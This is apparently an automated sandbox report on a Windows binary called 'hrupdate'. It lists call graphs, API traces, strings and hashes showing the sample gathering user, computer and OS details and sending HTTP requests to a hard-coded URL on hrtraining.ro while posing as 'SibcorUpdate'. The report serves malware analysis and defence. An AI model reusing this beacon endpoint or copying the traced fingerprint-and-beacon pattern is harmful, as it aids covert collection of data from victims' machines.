20982->20932 20984 673934 20983->20984 20984->20953 20988 6728a7 20985->20988 20986 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20987 671785 20986->20987 20989 6710a0 20987->20989 20988->20986 20990 672dcf 4 API calls 20989->20990 20991 6710eb _Cnd_init 20990->20991 20992 671122 ?_Throw_C_error@std@@YAXH 20991->20992 20993 671128 _Mtx_init 20991->20993 20992->20993 20994 671157 _Mtx_lock 20993->20994 20995 671151 ?_Throw_C_error@std@@YAXH 20993->20995 20996 671185 _Thrd_start 20994->20996 20997 67117f ?_Throw_C_error@std@@YAXH 20994->20997 20995->20994 20998 6711c2 ?_Throw_C_error@std@@YAXH 20996->20998 21003 6711c8 20996->21003 20997->20996 20998->21003 20999 6711ef 21001 671201 _Mtx_unlock 20999->21001 21004 672dff free 20999->21004 21000 6711d0 _Cnd_wait 21002 6711e3 ?_Throw_C_error@std@@YAXH 21000->21002 21000->21003 21005 671225 _Mtx_destroy _Cnd_destroy 21001->21005 21006 67121f ?_Throw_C_error@std@@YAXH 21001->21006 21002->21003 21003->20999 21003->21000 21009 6711fe 21004->21009 21007 671250 21005->21007 21008 67124a terminate 21005->21008 21006->21005 21010 67126e ?_Throw_Cpp_error@std@@YAXH 21007->21010 21011 671279 _Thrd_detach 21007->21011 21008->21007 21009->21001 21010->21011 21012 671292 21011->21012 21013 67128c ?_Throw_C_error@std@@YAXH 21011->21013 21014 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21012->21014 21013->21012 21015 6712b7 GetMessageW 21014->21015 21015->20970 21015->20971 20684 671090 20687 672b00 _Mtx_lock 20684->20687 20688 672b54 _Cnd_signal 20687->20688 20689 672b4e ?_Throw_C_error@std@@YAXH 20687->20689 20690 672b6e _Mtx_unlock 20688->20690 20691 672b68 ?_Throw_C_error@std@@YAXH 20688->20691 20689->20688 20692 672b84 20690->20692 20693 672b7e ?_Throw_C_error@std@@YAXH 20690->20693 20691->20690 20699 6712c0 20692->20699 20693->20692 20696 672b95 20710 672dff 20696->20710 20697 67109a 20700 6712e7 _Query_perf_frequency _Query_perf_counter 20699->20700 20701 67145b 20699->20701 20708 671346 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20700->20708 20702 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20701->20702 20703 671469 _Cnd_do_broadcast_at_thread_exit 20702->20703 20703->20696 20703->20697 20704 671315 _Query_perf_frequency _Query_perf_counter 20704->20708 20705 6713ea _Xtime_get_ticks 20705->20708 20706 671425 _Thrd_sleep 20707 67146d ?_Xbad_function_call@std@ 20706->20707 20706->20708 20708->20700 20708->20701 20708->20704 20708->20705 20708->20706 20713 672bc0 20708->20713 20924 6732bc 20710->20924 20714 672daa 20713->20714 20715 672be9 20713->20715 20716 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20714->20716 20724 671b30 6 API calls 20715->20724 20718 672dba 20716->20718 20718->20708 20720 671b30 18 API calls 20721 672cc1 GetConsoleWindow ShowWindow WSAStartup 20720->20721 20730 672180 20721->20730 20725 671c6d CloseHandle CloseHandle CloseHandle FreeLibrary 20724->20725 20728 671bd4 20724->20728 20726 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20725->20726 20727 671c98 20726->20727 20727->20720 20728->20725 20729 671c19 VirtualProtect memcpy VirtualProtect 20728->20729 20729->20728 20768 671ca0 20730->20768 20732 67223c socket 20733 6722dc 20732->20733 20734 67226c inet_addr 20732->20734 20871 671050 20733->20871 20735 672283 inet_addr gethostbyaddr 20734->20735 20736 67227b gethostbyname 20734->20736 20737 67229c 20735->20737 20736->20737 20737->20733 20739 6722a0 htons connect 20737->20739 20739->20733 20741 671050 __stdio_common_vsprintf 20742 672381 20741->20742 20742->20742 20743 672407 send memset recv 20742->20743 20744 672451 realloc memcpy memset recv 20743->20744 20745 6724b8 strstr 20743->20745 20744->20744 20744->20745 20746 6724e7 20745->20746 20747 6724d4 strstr 20745->20747 20748 6724f9 memcpy 20746->20748 20747->20746 20874 672e0d 20748->20874 20769 671cf0 20768->20769 20769->20769 20875 672730 20769->20875 20771 671d03 20772 672730 13 API calls 20771->20772 20777 671d3d 20772->20777 20773 671dd1 20775 671e05 20773->20775 20776 671dd8 memcpy 20773->20776 20774 671dca 20779 672dff free 20774->20779 20780 672730 13 API calls 20775->20780 20776->20775 20777->20773 20777->20774 20778 671dc4 _invalid_parameter_noinfo_noreturn 20777->20778 20778->20774 20779->20773 20784 671e38 20780->20784 20781 671ecd 20782 671ed6 memcpy 20781->20782 20783 671f03 20781->20783 20782->20783 20787 671f2a 20783->20787 20788 671f18 memchr 20783->20788 20784->20781 20785 671ec6 20784->20785 20789 671ec0 _invalid_parameter_noinfo_noreturn 20784->20789 20786 672dff free 20785->20786 20786->20781 20790 671f3e 20787->20790 20791 6720dd 20787->20791 20788->20787 20789->20785 20793 672730 13 API calls 20790->20793 20792 6720f8 20791->20792 20794 672730 13 API calls 20791->20794 20795 672730 13 API calls 20792->20795 20796 671f69 20793->20796 20794->20792 20797 672106 20795->20797 20893 6726b0 20796->20893 20799 672730 13 API calls 20797->20799 20844 6720d8 20799->20844 20801 671fa1 20806 672dff free 20801->20806 20802 672167 20809 6729e0 2 API calls 20802->20809 20803 671fc8 20808 672730 13 API calls 20803->20808 20804 672141 20811 672dff free 20804->20811 20805 671f9b _invalid_parameter_noinfo_noreturn 20805->20801 20812 671fa8 20806->20812 20807 672dbe __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 20813 672163 20807->20813 20814 671feb 20808->20814 20815 67216c 20809->20815 20810 67213b _invalid_parameter_noinfo_noreturn 20810->20804 20816 672148 20811->20816 20812->20802 20812->20803 20813->20732 20817 6726b0 2 API calls 20814->20817 20899 6729e0 ?_Xout_of_range@std@@YAXPBD 20815->20899 20816->20807 20819 671ff6 20817->20819 20822 672022 20819->20822 20824 67201c _invalid_parameter_noinfo_noreturn 20819->20824 20826 672029 20819->20826 20821 671ca0 21 API calls 20823 67223c socket 20821->20823 20825 672dff free 20822->20825 20827 6722dc 20823->20827 20828 67226c inet_addr 20823->20828 20824->20822 20825->20826 20826->20815 20831 67207c 20826->20831 20833 671050 __stdio_common_vsprintf 20827->20833 20829 672283 inet_addr gethostbyaddr 20828->20829 20830 67227b gethostbyname 20828->20830 20832 67229c 20829->20832 20830->20832 20835 672730 13 API calls 20831->20835 20832->20827 20834 6722a0 htons connect 20832->20834 20839 672312 20833->20839 20834->20827 20836 672099 20835->20836 20837 6726b0 2 API calls 20836->20837 20838 6720a5 20837->20838 20840 6720d1 20838->20840 20842 6720cb _invalid_parameter_noinfo_noreturn 20838->20842 20838->20844 20839->20839 20841 671050 __stdio_common_vsprintf 20839->20841 20843 672dff free 20840->20843 20845 672381 20841->20845 20842->20840 20843->20844 20844->20804 20844->20810 20844->20816 20845->20845 20846 672407 send memset recv 20845->20846 20847 672451 realloc memcpy memset recv 20846->20847 20848 6724b8 strstr 20846->20848 20847->20847 20847->20848 20849 6724e7 20848->20849 20850 6724d4 strstr 20848->20850 20851 6724f9 memcpy 20849->20851 20850->20849 20903 672e0d 20851->20903 20920 671010 20871->20920 20873 671063 20873->20741 20876 672774 20875->20876 20879 67274e memcpy 20875->20879 20877 67285f 20876->20877 20882 6727ed 20876->20882 20883 6727c8 20876->20883 20913 672a10 ?_Xlength_error@std@@YAXPBD 20877->20913 20879->20771 20881 672864 20886 6727d9 20882->20886 20887 672dcf 4 API calls 20882->20887 20904 672dcf 20883->20904 20885 6727fe memcpy 20888 672823 20885->20888 20889 672849 20885->20889 20886->20885 20890 672859 _invalid_parameter_noinfo_noreturn 20886->20890 20887->20886 20888->20890 20891 672840 20888->20891 20889->20771 20890->20877 20892 672dff free 20891->20892 20892->20889 20894 6726be 20893->20894 20898 671f75 20893->20898 20895 672727 _invalid_parameter_noinfo_noreturn 20894->20895 20896 6726e1 20894->20896 20894->20898 20897 672dff free 20896->20897 20897->20898 20898->20801 20898->20805 20898->20812 20900 6729f6 20899->20900 20901 672171 20899->20901 20902 672dff free 20900->20902 20901->20821 20902->20901 20905 672de1 malloc 20904->20905 20906 672dd4 _callnewh 20905->20906 20907 672dee 20905->20907 20906->20905 20909 672df0 20906->20909 20907->20886 20908 673292 20910 6732a0 _CxxThrowException 20908->20910 20909->20908 20911 673283 _CxxThrowException 20909->20911 20912 6732b6 20910->20912 20911->20908 20912->20886 20914 672a4d 20913->20914 20915 672a58 _Mtx_unlock 20913->20915 20918 672dff free 20914->20918 20916 672a73 ?_Throw_C_error@std@@YAXH 20915->20916 20917 672a7d _Mtx_destroy _Cnd_destroy 20915->20917 20916->20917 20917->20881 20919 672a55 20918->20919 20919->20915 20923 671000 20920->20923 20922 671026 __stdio_common_vsprintf 20922->20873 20923->20922 20925 673b53 free 20924->20925

                                      Executed Functions

                                      Function 00671CA0 Relevance: 65.5, APIs: 31, Strings: 6, Instructions: 786networkstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DC4
                                      • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DFD
                                        • Part of subcall function 00672730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0067275D
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671EC0
                                      • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671EFB
                                      • memchr.VCRUNTIME140 ref: 00671F1C
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671F9B
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 0067201C
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5), ref: 006720CB
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(006742CD,00000000,00674308,00000001,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 0067213B
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                      • inet_addr.WS2_32(00000000), ref: 00672273
                                      • gethostbyname.WS2_32(00000000), ref: 0067227B
                                      • inet_addr.WS2_32(00000000), ref: 00672283
                                      • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00672296
                                      • htons.WS2_32(00000050), ref: 006722BB
                                      • connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                        • Part of subcall function 00672730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0067280C
                                      • send.WS2_32(00000000,?,?,00000000), ref: 00672414
                                      • memset.VCRUNTIME140 ref: 00672429
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 00672445
                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00672465
                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 0067247D
                                      • memset.VCRUNTIME140 ref: 00672495
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 006724AC
                                      • strstr.VCRUNTIME140 ref: 006724C7
                                      • strstr.VCRUNTIME140 ref: 006724DA
                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00672508
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00672530
                                      • closesocket.WS2_32(?), ref: 00672563
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672595
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006725D1
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672628
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy$inet_addrmemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                      • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                      • API String ID: 241144766-2968714747
                                      • Opcode ID: 71425c9cb8b6a99e54fa0f3d1d1d44ca281a2c1c5873eeaf5546bb1c3cb9a130
                                      • Instruction ID: 2b0779c1f403106f20fd427f20977f3e54091cb76cb5b2e21c639a03f151754b
                                      • Opcode Fuzzy Hash: 71425c9cb8b6a99e54fa0f3d1d1d44ca281a2c1c5873eeaf5546bb1c3cb9a130
                                      • Instruction Fuzzy Hash: 1D5238319001598FDB24DF68CCA4BEDBB77EF45314F1482A9E40DAB281DB329A85CF60
                                      Function 00671480 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 269windowstringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 006714D0
                                      • GetUserNameW.ADVAPI32(?,?), ref: 006714EE
                                      • wcstombs_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000101,?,00000101), ref: 00671513
                                      • memset.VCRUNTIME140 ref: 0067155E
                                      • strncat.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000400), ref: 00671579
                                        • Part of subcall function 00672180: socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                        • Part of subcall function 00672180: inet_addr.WS2_32(00000000), ref: 00672273
                                        • Part of subcall function 00672180: gethostbyname.WS2_32(00000000), ref: 0067227B
                                        • Part of subcall function 00672180: htons.WS2_32(00000050), ref: 006722BB
                                        • Part of subcall function 00672180: connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • WSACleanup.WS2_32 ref: 006715A7
                                      • LoadStringW.USER32(?,00000067,SibcorUpdate,00000064), ref: 006715BD
                                      • LoadStringW.USER32(?,0000006D,SIBCORUPDATE,00000064), ref: 006715C9
                                      • LoadIconW.USER32(?,0000006B), ref: 0067160C
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0067161B
                                      • LoadIconW.USER32(?,0000006C), ref: 0067164D
                                      • RegisterClassExW.USER32(00000030), ref: 0067165C
                                      • CreateWindowExW.USER32(00000000,SIBCORUPDATE,SibcorUpdate,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0067168E
                                      • UpdateWindow.USER32(00000000), ref: 0067169F
                                      • LoadIconW.USER32(?,0000006B), ref: 006716A8
                                      • lstrcpyW.KERNEL32(?,HR Trainings), ref: 006716F2
                                      • Shell_NotifyIconW.SHELL32(00000000,000003BC), ref: 00671701
                                      • LoadAcceleratorsW.USER32(?,0000006D), ref: 0067170A
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00671819
                                      • DialogBoxParamW.USER32(?,00000067,?,00671A20,00000000), ref: 00671839
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00671859
                                      • TranslateMessage.USER32(?), ref: 0067186A
                                      • DispatchMessageW.USER32(?), ref: 00671877
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0067188A
                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006718A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Load$IconMessage$StringTranslateWindow$AcceleratorAcceleratorsClassCleanupCreateCursorDialogDispatchNameNotifyParamRegisterShell_StartupUpdateUserconnectgethostbynamehtonsinet_addrlstrcpymemsetsocketstrncatterminatewcstombs_s
                                      • String ID: ,Dg$HR Trainings$SIBCORUPDATE$SibcorUpdate$http://www.hrtraining.ro/trakingu/
                                      • API String ID: 821071236-3868026344
                                      • Opcode ID: 1d1096f865704529330a5073a26a8581e8bfaeb79caa34753a15204c31ec98fd
                                      • Instruction ID: 37caad4d6a82c5c6d97e22f55130243aa366924fdf7f14d7b9239964ecd5f0be
                                      • Opcode Fuzzy Hash: 1d1096f865704529330a5073a26a8581e8bfaeb79caa34753a15204c31ec98fd
                                      • Instruction Fuzzy Hash: EDC16B70D403299BEB24DF64DC49BEABBB9EB05705F0041DAE50DA6280DBB56BC4CF91
                                      Function 0469CCA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • GetUserNameA.ADVAPI32(?,?), ref: 0469CD08
                                      • GetComputerNameA.KERNEL32(?,?), ref: 0469CD18
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 0469CD2C
                                      • _strrchr.LIBCMT ref: 0469CD3B
                                      • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0469CD56
                                      • __snprintf.LIBCMT ref: 0469CDCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                                      • String ID: %s%s%s
                                      • API String ID: 1877169212-1891519693
                                      • Opcode ID: 3a3d78d8001dbbfa8abe69f64fcd8b8271ef147f6d1a048af0ea9f00236c27d4
                                      • Instruction ID: dab70b2f5b5404c98bfb3054e99627fe19bed293c19c323e5bdb760d6bced202
                                      • Opcode Fuzzy Hash: 3a3d78d8001dbbfa8abe69f64fcd8b8271ef147f6d1a048af0ea9f00236c27d4
                                      • Instruction Fuzzy Hash: FE419D71D00205AEEF01AFA5DD49DBEBFF8EF45314F10446AE504A6251FBB5AE00DB64
                                      Function 046A5173 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44encryptionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 816 46a5173-46a519a CryptAcquireContextA 817 46a519c-46a51ad CryptAcquireContextA 816->817 818 46a51b3-46a51c6 CryptGenRandom 816->818 817->818 819 46a51af-46a51b2 817->819 820 46a51c8-46a51d5 CryptReleaseContext 818->820 821 46a51d7-46a51d9 818->821 820->819 821->820
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000080,00000000,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A5196
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51A9
                                      • CryptGenRandom.ADVAPI32(00000000,0469CE33,?,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51BD
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$Acquire$RandomRelease
                                      • String ID: Microsoft Base Cryptographic Provider v1.0
                                      • API String ID: 685801729-291530887
                                      • Opcode ID: 50a0065e9d0177d8c44a6a369e3154ee005084b81ce946796e92da3b72108153
                                      • Instruction ID: fac065636faa7ece3dd7c190ff4d318e33f61bf78f942d64cd8ca43ecfdec53b
                                      • Opcode Fuzzy Hash: 50a0065e9d0177d8c44a6a369e3154ee005084b81ce946796e92da3b72108153
                                      • Instruction Fuzzy Hash: A4F08136A01224F7DF108A51DD09FEE7A6CDB45764F104011FA02A2140E671AE109EA4
                                      Function 046AE81B Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: p=v
                                      • API String ID: 0-1262632170
                                      • Opcode ID: 554588e925b44466993c2a017f1faf32c77b4d25bc138d1276de5794f8837f1a
                                      • Instruction ID: a4334244c21ed68580b38bb53d338428586991b53007cbdd22ac56e92c25171f
                                      • Opcode Fuzzy Hash: 554588e925b44466993c2a017f1faf32c77b4d25bc138d1276de5794f8837f1a
                                      • Instruction Fuzzy Hash: DCD022313C8D089AFB40FE00FC801797399E7E0A10F800E9DEA0102100BA27FC31CE81
                                      Function 00672180 Relevance: 42.3, APIs: 20, Strings: 4, Instructions: 344networkstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 221 672180-67226a call 671ca0 socket 224 6722e4-6722e6 221->224 225 67226c-672279 inet_addr 221->225 228 6722ec-672317 call 671050 224->228 226 672283-672296 inet_addr gethostbyaddr 225->226 227 67227b-672281 gethostbyname 225->227 229 67229c-67229e 226->229 227->229 234 672320-672333 228->234 231 6722a0-6722da htons connect 229->231 232 6722dc-6722e1 229->232 231->228 231->232 232->224 234->234 235 672335-67233c 234->235 236 672340-672348 235->236 236->236 237 67234a-67238c call 671050 236->237 240 672390-672395 237->240 240->240 241 672397-67239f 240->241 242 6723a0-6723a6 241->242 242->242 243 6723a8-6723bd 242->243 244 6723c0-6723c8 243->244 244->244 245 6723ca-6723e3 244->245 246 6723e4-6723ec 245->246 246->246 247 6723ee-6723fd 246->247 248 672400-672405 247->248 248->248 249 672407-67244f send memset recv 248->249 250 672451-6724b6 realloc memcpy memset recv 249->250 251 6724b8-6724d2 strstr 249->251 250->250 250->251 252 6724e7-6724eb 251->252 253 6724d4-6724e5 strstr 251->253 254 6724ee-672572 call 672e0d memcpy call 672e0d strncpy call 672dff closesocket 252->254 253->252 253->254 261 6725a5-6725ae 254->261 262 672574-672583 254->262 263 6725e1-672605 261->263 264 6725b0-6725bf 261->264 265 672585-672593 262->265 266 67259b-6725a2 call 672dff 262->266 269 672607-672616 263->269 270 672638-672659 call 672dbe 263->270 267 6725d7-6725de call 672dff 264->267 268 6725c1-6725cf 264->268 265->266 271 672595 _invalid_parameter_noinfo_noreturn 265->271 266->261 267->263 268->267 275 6725d1 _invalid_parameter_noinfo_noreturn 268->275 277 67262e-672635 call 672dff 269->277 278 672618-672626 269->278 271->266 275->267 277->270 278->277 281 672628 _invalid_parameter_noinfo_noreturn 278->281 281->277
                                      APIs
                                        • Part of subcall function 00671CA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DC4
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                      • inet_addr.WS2_32(00000000), ref: 00672273
                                      • gethostbyname.WS2_32(00000000), ref: 0067227B
                                      • inet_addr.WS2_32(00000000), ref: 00672283
                                      • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00672296
                                      • htons.WS2_32(00000050), ref: 006722BB
                                      • connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • send.WS2_32(00000000,?,?,00000000), ref: 00672414
                                      • memset.VCRUNTIME140 ref: 00672429
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 00672445
                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00672465
                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 0067247D
                                      • memset.VCRUNTIME140 ref: 00672495
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 006724AC
                                      • strstr.VCRUNTIME140 ref: 006724C7
                                      • strstr.VCRUNTIME140 ref: 006724DA
                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00672508
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00672530
                                      • closesocket.WS2_32(?), ref: 00672563
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672595
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006725D1
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672628
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$inet_addrmemcpymemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsreallocsendsocketstrncpy
                                      • String ID: $$GET %s HTTP/1.0$Host: %s
                                      • API String ID: 1879041676-1199678302
                                      • Opcode ID: 4c0fa364c9beadfdbc0fddcc2ada1d4689ade680e15c0e3575c30b6447cbc18b
                                      • Instruction ID: 7b6e03c73bb8f30e80a3e91a320549e7357da60f9cc9d14a066ccc15265e073c
                                      • Opcode Fuzzy Hash: 4c0fa364c9beadfdbc0fddcc2ada1d4689ade680e15c0e3575c30b6447cbc18b
                                      • Instruction Fuzzy Hash: 65D1D2719002199FEB24DF24CC59BEDB777AF95304F0482D8E40DAB282DB329A95CF64
                                      Function 006710A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 175COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00672DCF: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DE4
                                      • _Cnd_init.MSVCP140(?,00000000), ref: 0067110F
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671123
                                      • _Mtx_init.MSVCP140(?,00000001), ref: 00671144
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671152
                                      • _Mtx_lock.MSVCP140(?), ref: 00671172
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671180
                                      • _Thrd_start.MSVCP140(?,Function_00001090,00674424), ref: 006711AA
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000001), ref: 006711C3
                                      • _Cnd_wait.MSVCP140(?,?), ref: 006711D6
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 006711E4
                                      • _Mtx_unlock.MSVCP140(?), ref: 00671212
